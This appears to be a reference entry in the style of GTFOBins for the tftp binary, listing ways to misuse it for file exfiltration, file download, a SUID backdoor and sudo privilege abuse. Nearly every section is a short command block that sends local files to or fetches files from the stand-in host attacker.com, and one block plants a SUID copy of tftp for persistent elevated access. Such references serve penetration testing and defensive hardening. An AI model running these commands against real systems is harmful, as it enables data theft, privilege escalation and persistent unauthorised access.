It can exfiltrate files on the network.
Send local file to a TFTP server.
RHOST=attacker.com
tftp $RHOST
put file_to_sendIt can download remote files.
Fetch a remote file from a TFTP server.
RHOST=attacker.com
tftp $RHOST
get file_to_getIt runs with the SUID bit set and may be exploited to access the file
system, escalate or maintain access with elevated privileges working as a
SUID backdoor. If it is used to run sh -p, omit the -p argument on systems
like Debian that allow the default sh shell to run with SUID privileges.
Send local file to a TFTP server.
sudo sh -c 'cp $(which tftp) .; chmod +s ./tftp'
RHOST=attacker.com
./tftp $RHOST
put file_to_sendIt runs in privileged context and may be used to access the file system,
escalate or maintain access with elevated privileges if enabled on sudo.
Send local file to a TFTP server.
RHOST=attacker.com
sudo -E tftp $RHOST
put file_to_send